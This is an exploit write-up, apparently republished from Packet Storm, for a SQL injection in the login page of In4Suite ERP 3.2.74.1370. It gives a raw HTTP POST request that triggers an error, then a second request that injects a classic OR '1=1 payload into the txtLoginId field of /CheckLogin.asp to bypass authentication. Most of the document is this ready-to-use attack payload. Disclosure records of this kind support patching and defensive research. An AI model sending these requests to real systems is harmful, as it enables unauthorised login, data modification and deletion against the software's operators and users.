Share
## https://sploitus.com/exploit?id=PACKETSTORM:162653
# Exploit Title: In4Suit ERP 3.2.74.1370 - 'txtLoginId' SQL injection  
# Date: 18/05/2021  
# Exploit Author: Gulab Mondal  
# Vendor Homepage: https://www.in4velocity.com/in4suite-erp.html  
# Version: In4Suite ERP 3.2.74.1370  
# Tested on: Windows  
  
-----------------------------------------  
  
SQL injection in In4Suite ERP 3.2.74.1370 allows remote attackers to  
modify or delete data, causing persistent changes to the application's  
content or behavior by using malicious SQL queries.  
  
--------------  
  
  
# Error condition  
POST /CheckLogin.asp HTTP/1.1  
Host: 127.0.0.1  
  
txtLoginId=admin&txtpassword=test&cmbLogin=Login&hdnPwdEncrypt=" "  
  
# SQL Injection exploitation  
POST /CheckLogin.asp HTTP/1.1  
Host: 127.0.0.1  
  
txtLoginId=admin OR '1=1&txtpassword=test&cmbLogin=Login&hdnPwdEncrypt="  
  
------------------------------